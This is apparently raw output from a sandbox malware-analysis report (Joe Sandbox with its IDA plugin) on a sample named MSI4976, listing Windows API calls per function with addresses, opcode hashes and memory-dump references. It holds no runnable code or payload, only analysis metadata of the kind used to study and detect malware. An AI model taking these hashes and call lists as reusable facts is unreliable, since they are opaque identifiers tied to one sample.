                                        • Opcode Fuzzy Hash: a28630a5ebb96220e6fccecb5004986d9f4962d01b2e6767b227313795c75e50
                                        • Instruction Fuzzy Hash: D521CFB6540208BFEB27DF649C85EBFB6ECEB49744F10801AF10AA6140EB68ED058770
                                        APIs
                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0039454E
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        • _memset.LIBCMT ref: 00323965
                                        • _wcscpy.LIBCMT ref: 003239B5
                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 003239C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                        • String ID: Line:
                                        • API String ID: 3942752672-1585850449
                                        • Opcode ID: 699ee55b654e8e76c685ce87c3c903a75fe2767b3c801c43d2df970a78f088f0
                                        • Instruction ID: a9b28135b01f0a1471815f536e58527558b909eeb9a9a7f3f979d83e457be104
                                        • Opcode Fuzzy Hash: 699ee55b654e8e76c685ce87c3c903a75fe2767b3c801c43d2df970a78f088f0
                                        • Instruction Fuzzy Hash: 38318171409350ABD723EB60EC45FDBB7ECAF55310F40461AF1859A1A1DB74AA88CB92
                                        APIs
                                          • Part of subcall function 0033C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0033C657
                                          • Part of subcall function 0033C619: GetStockObject.GDI32(00000011), ref: 0033C66B
                                          • Part of subcall function 0033C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0033C675
                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00388F69
                                        • LoadLibraryW.KERNEL32(?), ref: 00388F70
                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00388F85
                                        • DestroyWindow.USER32(?), ref: 00388F8D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                        • String ID: SysAnimate32
                                        • API String ID: 4146253029-1011021900
                                        • Opcode ID: b037785234f62461c673036c67c4b1fa4ee86d17a04ad09ec682be826e4b13b7
                                        • Instruction ID: 541b20fbba8ddcc9b9f9d404c00f767636efce446e42776c58c92d1a014ff0a3
                                        • Opcode Fuzzy Hash: b037785234f62461c673036c67c4b1fa4ee86d17a04ad09ec682be826e4b13b7
                                        • Instruction Fuzzy Hash: 6621B871200305AFEF126F64EC80EBB37AEEB09324F914668FB5597190CB31DC929760
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0036E392
                                        • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 0036E3E6
                                        • __swprintf.LIBCMT ref: 0036E3FF
                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,003BDBF0), ref: 0036E43D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorMode$InformationVolume__swprintf
                                        • String ID: %lu
                                        • API String ID: 3164766367-685833217
                                        • Opcode ID: 8040d4c01882444613828b1e59dd8d13a593adadcf6ed9bfc6ba25a02d92a2a5
                                        • Instruction ID: 23925d8908026ab081e2835f454feb9b86260cc4ee4dc16ba5a5398b2c787b13
                                        • Opcode Fuzzy Hash: 8040d4c01882444613828b1e59dd8d13a593adadcf6ed9bfc6ba25a02d92a2a5
                                        • Instruction Fuzzy Hash: F1214F79A40108AFCB11EFA5DC85EEE7BB8EF49714F108069F50AEB251D631DA05CB51
                                        APIs
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                          • Part of subcall function 0035D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0035D640
                                          • Part of subcall function 0035D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 0035D653
                                          • Part of subcall function 0035D623: GetCurrentThreadId.KERNEL32 ref: 0035D65A
                                          • Part of subcall function 0035D623: AttachThreadInput.USER32(00000000), ref: 0035D661
                                        • GetFocus.USER32 ref: 0035D7FB
                                          • Part of subcall function 0035D66C: GetParent.USER32(?), ref: 0035D67A
                                        • GetClassNameW.USER32(?,?,00000100), ref: 0035D844
                                        • EnumChildWindows.USER32(?,0035D8BA), ref: 0035D86C
                                        • __swprintf.LIBCMT ref: 0035D886
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                        • String ID: %s%d
                                        • API String ID: 1941087503-1110647743
                                        • Opcode ID: 5dbb1406bd2f44d78a589d9de809ba598433246b3496028d6630bd7a507495a7
                                        • Instruction ID: 904cdc1251de99e12e5c250741937cb81f38a70fb334cd8b55930adec09fdf19
                                        • Opcode Fuzzy Hash: 5dbb1406bd2f44d78a589d9de809ba598433246b3496028d6630bd7a507495a7
                                        • Instruction Fuzzy Hash: 651181755002056BDF23BFA09C86FEA376DAB44705F0040B9FE09AE1A6DBB499498B70
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0033C657
                                        • GetStockObject.GDI32(00000011), ref: 0033C66B
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0033C675
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CreateMessageObjectSendStockWindow
                                        • String ID: @U=u
                                        • API String ID: 3970641297-2594219639
                                        • Opcode ID: ee5755f5714ec0248193c45ff009c7dcbbaab36bdc9cb0dd50d3157e2bfefda1
                                        • Instruction ID: f24608eb51b733ac7ffa70d83a8435e1d5671776d5b7a79eed5be4a57a45e610
                                        • Opcode Fuzzy Hash: ee5755f5714ec0248193c45ff009c7dcbbaab36bdc9cb0dd50d3157e2bfefda1
                                        • Instruction Fuzzy Hash: D811C072511658BFDF134FA09C81EEABB6DFF09364F0A2215FA05A6120C732DC60DBA0
                                        APIs
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003818E4
                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00381917
                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00381A3A
                                        • CloseHandle.KERNEL32(?), ref: 00381AB0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                        • String ID:
                                        • API String ID: 2364364464-0
                                        • Opcode ID: a442fcb521e0168a74e88c3c038b6b23a67192f2d625832a5e1b89ca837c8f25
                                        • Instruction ID: b6e7ce846b9e9c29ecbc1903b91b18b49cdb80e9903c6e4f57db56fd70597a99
                                        • Opcode Fuzzy Hash: a442fcb521e0168a74e88c3c038b6b23a67192f2d625832a5e1b89ca837c8f25
                                        • Instruction Fuzzy Hash: D381A571A00314ABDF15EF64C886BADBBF9AF44720F158059F905AF382D7B8ED418B90
                                        APIs
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 003805DF
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0038066E
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0038068C
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 003806D2
                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 003806EC
                                          • Part of subcall function 0033F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0036AEA5,?,?,00000000,00000008), ref: 0033F282
                                          • Part of subcall function 0033F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0036AEA5,?,?,00000000,00000008), ref: 0033F2A6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                        • String ID:
                                        • API String ID: 327935632-0
                                        • Opcode ID: 2870532365cba2900b357565ab3ff27b510af7cac42450492f58df30d062cfb6
                                        • Instruction ID: 8df5bcbf652f70b654b7711d398c4004b5aff925c64e375d1b47cf60cc42c154
                                        • Opcode Fuzzy Hash: 2870532365cba2900b357565ab3ff27b510af7cac42450492f58df30d062cfb6
                                        • Instruction Fuzzy Hash: F0518A75A00215DFCB06EFA8D4909EDB7B8FF49310F1580A5E946AB352EB30ED09CB90
                                        APIs
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                          • Part of subcall function 00383AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00382AA6,?,?), ref: 00383B0E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00382DE0
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00382E1F
                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00382E66
                                        • RegCloseKey.ADVAPI32(?,?), ref: 00382E92
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00382E9F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                        • String ID:
                                        • API String ID: 3440857362-0
                                        • Opcode ID: c4474c50371a77305eac74ccdb963ca20745451ed764c7f5aac226545fc0758f
                                        • Instruction ID: ea1858f0df3262ffc34fdf8381890ae756897085df9112baaa832306c8127e95
                                        • Opcode Fuzzy Hash: c4474c50371a77305eac74ccdb963ca20745451ed764c7f5aac226545fc0758f
                                        • Instruction Fuzzy Hash: A0515A71214304AFC706EF64D881E6BB7E8BF88704F04895DF5968B2A1EB31E905CB52
                                        APIs
                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003717D4
                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003717FD
                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0037183C
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00371861
                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00371869
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                        • String ID:
                                        • API String ID: 1389676194-0
                                        • Opcode ID: f8d3c3047091fc942f0825f065c5d91e4506c9fb7b460c102ede290c9d0fd8b5
                                        • Instruction ID: 3c0b8e2cad9c4b6f554a8e4620f449b984b4cdb50fd3f85254f48626003ecdf5
                                        • Opcode Fuzzy Hash: f8d3c3047091fc942f0825f065c5d91e4506c9fb7b460c102ede290c9d0fd8b5
                                        • Instruction Fuzzy Hash: 33411A35A00215EFCB12EF65C991AADBBF5EF49310B14C099E80AAF362DB35ED01DB51
                                        APIs
                                        • GetCursorPos.USER32(000000FF), ref: 0033B749
                                        • ScreenToClient.USER32(00000000,000000FF), ref: 0033B766
                                        • GetAsyncKeyState.USER32(00000001), ref: 0033B78B
                                        • GetAsyncKeyState.USER32(00000002), ref: 0033B799
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AsyncState$ClientCursorScreen
                                        • String ID:
                                        • API String ID: 4210589936-0
                                        • Opcode ID: 0e5df04a49adf356c437301c905359bbf520f6933d19180894d65ec2610b560c
                                        • Instruction ID: 4d3d00ebdaab1218ae8b823280fd2922ad593c859790214c19a22f0eaaacc744
                                        • Opcode Fuzzy Hash: 0e5df04a49adf356c437301c905359bbf520f6933d19180894d65ec2610b560c
                                        • Instruction Fuzzy Hash: 48413B75904219FFDF16DF64C884AEAFBB8FF45364F204359F82996290C730A990DBA1
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 0035C156
                                        • PostMessageW.USER32(?,00000201,00000001), ref: 0035C200
                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0035C208
                                        • PostMessageW.USER32(?,00000202,00000000), ref: 0035C216
                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0035C21E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessagePostSleep$RectWindow
                                        • String ID:
                                        • API String ID: 3382505437-0
                                        • Opcode ID: bfaa2b53519a9be26f9da5fbdc719f13bc0dd7a30e0abe76415576357585398d
                                        • Instruction ID: 924696d5d239ed27825f5b14b9096f7a9eb51d16aee364d06c90bb167e184be0
                                        • Opcode Fuzzy Hash: bfaa2b53519a9be26f9da5fbdc719f13bc0dd7a30e0abe76415576357585398d
                                        • Instruction Fuzzy Hash: 6831C071500619EFDF05CFA8DD4CA9E3BB9EB0531AF114214FC21AA1E1C7B09A08CB90
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • GetWindowLongW.USER32(?,000000F0), ref: 0038DCC0
                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0038DCE4
                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0038DCFC
                                        • GetSystemMetrics.USER32(00000004), ref: 0038DD24
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,0037407D,00000000), ref: 0038DD42
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$Long$MetricsSystem
                                        • String ID:
                                        • API String ID: 2294984445-0
                                        • Opcode ID: 0376d00922445868690dc77c6a7f21eb5b440eaa925880c22928dd50a4d88020
                                        • Instruction ID: 123c7f5e66e552ed9e4a55e6e562a5f0feb3ce71fe271c295744d303c3d98cf6
                                        • Opcode Fuzzy Hash: 0376d00922445868690dc77c6a7f21eb5b440eaa925880c22928dd50a4d88020
                                        • Instruction Fuzzy Hash: 9221C171604321AFCB226F799C88B6977A9FF46365F110724F926C69E0E7709C14CB90
                                        APIs
                                        • IsWindow.USER32(00000000), ref: 003789CE
                                        • GetForegroundWindow.USER32 ref: 003789E5
                                        • GetDC.USER32(00000000), ref: 00378A21
                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00378A2D
                                        • ReleaseDC.USER32(00000000,00000003), ref: 00378A68
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$ForegroundPixelRelease
                                        • String ID:
                                        • API String ID: 4156661090-0
                                        • Opcode ID: 649c33d57f31ccfd94b9b8533900954e28a5c4b6823641b36ba45c1dc73b250a
                                        • Instruction ID: d75cd5f61b81f731d4b7c698597cf99986c6bec4f2aa5cfa8e4ccb3ac058ea8d
                                        • Opcode Fuzzy Hash: 649c33d57f31ccfd94b9b8533900954e28a5c4b6823641b36ba45c1dc73b250a
                                        • Instruction Fuzzy Hash: 40219276A00200AFDB15EF65D889AAABBF9EF45300F04C478E94ADB761DB74AD40CB50
                                        APIs
                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0033B5EB
                                        • SelectObject.GDI32(?,00000000), ref: 0033B5FA
                                        • BeginPath.GDI32(?), ref: 0033B611
                                        • SelectObject.GDI32(?,00000000), ref: 0033B63B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ObjectSelect$BeginCreatePath
                                        • String ID:
                                        • API String ID: 3225163088-0
                                        • Opcode ID: 8cca65d30f1428dd691b012b1d088fb1f9db6780c082d105115f7f1ea4153ff4
                                        • Instruction ID: cb58f24ac897f5db6b85ee1d2b64a77a6822e512c5414b5dfdd914e22550359c
                                        • Opcode Fuzzy Hash: 8cca65d30f1428dd691b012b1d088fb1f9db6780c082d105115f7f1ea4153ff4
                                        • Instruction Fuzzy Hash: 4A21AE71900388EFDB239F15ECC97A9BBECFB01325F14022AF6519A1E1C3708891CB91
                                        APIs
                                        • __calloc_crt.LIBCMT ref: 00342E81
                                        • CreateThread.KERNEL32(?,?,00342FB7,00000000,?,?), ref: 00342EC5
                                        • GetLastError.KERNEL32 ref: 00342ECF
                                        • _free.LIBCMT ref: 00342ED8
                                        • __dosmaperr.LIBCMT ref: 00342EE3
                                          • Part of subcall function 0034889E: __getptd_noexit.LIBCMT ref: 0034889E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
